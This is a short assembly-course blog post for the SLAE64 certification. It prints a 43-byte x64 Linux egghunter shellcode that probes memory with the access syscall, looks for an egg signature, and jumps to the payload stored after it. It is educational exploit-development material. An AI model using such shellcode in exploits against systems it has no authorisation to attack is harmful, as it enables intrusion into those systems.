Source: SecurityTube
x32 bits EggHunter can be found here
;SLAE-1322 Andriy Brukhovetskyy ;egg hunting explained some techniques ;http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf ;43 bytes global _start section .text _start: xor rcx, rcx ; 0 get_memory_block: ;getconf PAGE_SIZE in x64 is the same or dx, 0xfff ; is the same as "add dx, 4095" (PAGE_SIZE) checker: inc rdx ; next memory offset push byte +0x15 ; __NR_access 21 pop rax lea rbx, [rdx+8] ; alignment to validate the last four bytes of the signature ; rcx already contains 0 (F_OK) syscall ; syscall ;grep EFAULT /usr/include/asm-generic/errno-base.h ;bad address = EFAULT = 0xf2 = -14 cmp al, 0xf2; because it's not a file jz get_memory_block ; if is not, loop mov rax, 0x5090509050905090 ; egg here in little endiant mov rdi, rdx scasq jnz checker ; return and search jmp rdi; if we here == we found the eggs, jump to our shellcode :)
SLAE64 - 1322
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
No hay comentarios:
Publicar un comentario